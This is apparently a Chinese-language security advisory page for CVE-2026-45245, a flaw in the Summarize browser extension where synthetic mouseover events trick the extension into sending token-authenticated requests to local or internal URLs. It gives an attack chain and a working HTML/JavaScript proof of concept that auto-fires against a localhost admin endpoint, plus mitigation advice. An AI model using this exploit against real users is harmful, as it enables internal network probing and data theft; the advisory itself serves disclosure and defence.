IPBUF安全漏洞报告
English
CVE-2026-45245 CVSS 7.4 高危

CVE-2026-45245 Summarize悬停功能未授权请求漏洞

披露日期: 2026-05-18
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-45245
漏洞类型
CSRF
CVSS评分
7.4 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Summarize浏览器扩展

相关标签

CSRFSSRF浏览器扩展Summarize未授权访问

漏洞概述

Summarize浏览器扩展0.15.1之前的版本存在安全漏洞。该漏洞位于悬停摘要功能中,由于未正确验证事件的可信度,恶意网页可伪造合成鼠标悬停事件。当用户访问特定页面时,攻击者可利用此漏洞强制扩展使用存储的身份验证令牌,向本地或内网URL发起经过身份验证的守护进程请求,导致敏感内部信息泄露。

技术细节

该漏洞源于Summarize扩展对浏览器事件模型的安全验证缺失。扩展的悬停摘要功能依赖于监听DOM元素的鼠标悬停事件来触发预览请求。然而,扩展代码未检查触发事件的`isTrusted`属性,无法区分真实用户操作与脚本合成的伪造事件。攻击者可构造恶意HTML页面,在链接中嵌入本地网络地址(如`http://localhost:port`)或私有网络端点,并使用JavaScript的`dispatchEvent`方法分发合成的`mouseover`事件。由于扩展持有用户的高权限令牌,这些伪造的请求会绕过浏览器的同源策略限制,直接向内部守护进程发送认证请求,从而实现对内网服务的探测或数据窃取。

攻击链分析

STEP 1
1. 诱骗访问
攻击者搭建恶意网站,诱导受害者访问,该页面包含指向本地或内网敏感地址的隐藏或可见链接。
STEP 2
2. 事件伪造
恶意页面中的JavaScript脚本自动针对目标链接生成并分发合成的'mouseover'事件。
STEP 3
3. 漏洞触发
Summarize扩展捕获到该事件,由于未校验事件可信度(isTrusted),误以为用户进行了悬停操作。
STEP 4
4. 未授权请求
扩展利用其存储的认证令牌,向链接指向的内部端点(如本地守护进程)发起请求。
STEP 5
5. 信息泄露
内部服务响应请求,攻击者成功绕过网络边界,获取敏感信息或执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for CVE-2026-45245: Triggering Summarize via Synthetic Events --> <!-- This PoC demonstrates how a malicious site can trigger the extension without real user interaction --> <html> <body> <h2>CVE-2026-45245 PoC</h2> <p>Open this page with the vulnerable Summarize extension installed.</p> <!-- The target URL points to a local/internal resource (SSRF/CSRF target) --> <a href="http://127.0.0.1:8080/admin/config" id="target-link">Innocent Link</a> <script> // Function to simulate user interaction function triggerExploit() { const link = document.getElementById('target-link'); // Create a synthetic mouseover event // The extension fails to check event.isTrusted, so this works const syntheticEvent = new MouseEvent('mouseover', { bubbles: true, cancelable: true, view: window }); // Dispatch the event to the link // This causes the Summarize extension to fetch the URL using stored tokens link.dispatchEvent(syntheticEvent); console.log('Synthetic mouseover event dispatched. Check network logs for unauthorized request.'); } // Trigger automatically on load (or on interaction depending on CVSS UI:R interpretation) window.onload = triggerExploit; </script> </body> </html>

影响范围

Summarize < 0.15.1

防御指南

临时缓解措施
建议用户立即检查并更新Summarize浏览器扩展至最新版本。在未完成更新前,应谨慎浏览不明网页,或暂时禁用该扩展以防止凭证被利用攻击内部网络。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表